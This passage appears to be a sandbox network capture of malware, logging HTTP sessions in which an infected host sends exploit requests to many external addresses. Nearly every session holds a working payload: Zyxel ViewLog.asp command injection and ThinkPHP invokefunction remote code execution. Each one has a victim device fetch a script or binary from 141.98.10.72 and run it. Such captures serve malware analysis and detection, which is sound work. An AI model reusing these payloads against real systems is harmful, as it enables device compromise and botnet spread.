                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:31.354123116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:33.978157997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.098079920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:49.081582069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:10.584944010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.543762922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      256192.168.2.1544878112.198.55.12180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.505273104 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:30.554075956 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:32.698221922 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:33.093050957 CET170INHTTP/1.0 400 Bad Request
                                                      Server: AR
                                                      Date: wed, 14 feb 2024 15:58:49 GMT
                                                      Pragma: no-cache
                                                      Cache-Control: no-store
                                                      Content-Length: 11
                                                      Connection: Close
                                                      Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                      Data Ascii: Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      257192.168.2.153510031.200.101.2108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.545768023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      258192.168.2.153473294.123.8.2448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.545969963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      259192.168.2.153293694.122.198.288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.547154903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      260192.168.2.155046295.166.153.20180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.687042952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:29.900494099 CET605INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 11:22:09 GMT
                                                      Server: Apache/1.3.33 (Debian GNU/Linux) PHP/5.0.4-1.dotdeb.2 mod_ssl/2.8.22 OpenSSL/0.9.7d
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 54 68 65 20 72 65 71 75 65 73 74 20 6c 69 6e 65 20 63 6f 6e 74 61 69 6e 65 64 20 69 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 73 20 66 6f 6c 6c 6f 77 69 6e 67 20 74 68 65 20 70 72 6f 74 6f 63 6f 6c 20 73 74 72 69 6e 67 2e 3c 50 3e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 41 70 61 63 68 65 2f 31 2e 33 2e 33 33 20 53 65 72 76 65 72 20 61 74 20 6d 61 69 6c 2e 72 69 73 65 75 70 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>The request line contained invalid characters following the protocol string.<P><P><HR><ADDRESS>Apache/1.3.33 Server at mail.riseup.net Port 80</ADDRESS></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      261192.168.2.154441295.217.236.4680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.700846910 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:29.926822901 CET351INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:29 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 150
                                                      Connection: close
                                                      X-Frame-Options: SAMEORIGIN
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      262192.168.2.153651095.158.244.2980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:29.717200041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:29.959671974 CET614INHTTP/1.1 400 Bad Request
                                                      Server: Mini web server 1.0 ZTE corp 2005.
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache,no-store
                                                      Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      263192.168.2.153724494.123.16.268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.304352999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      264192.168.2.155031294.122.106.908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.304411888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      265192.168.2.155182495.86.89.358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.304471970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      266192.168.2.155181285.84.232.1998080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.519287109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:30.764483929 CET145INHTTP/1.1 401 Unauthorized
                                                      WWW-Authenticate: Basic realm="Network Camera"
                                                      Content-Type: text/html
                                                      Server: Network Camera
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      267192.168.2.153305695.209.132.2258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.545149088 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:31.114104033 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      268192.168.2.153409885.122.231.2518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.648206949 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      269192.168.2.153710894.137.74.2188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.721421957 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:30.962151051 CET295INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:30 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: keep-alive
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      270192.168.2.155657694.123.92.2448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.792958975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      271192.168.2.155880494.120.26.148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:30.797293901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      272192.168.2.153931494.120.229.628080
                                                      TimestampBytes transferredDirectionData
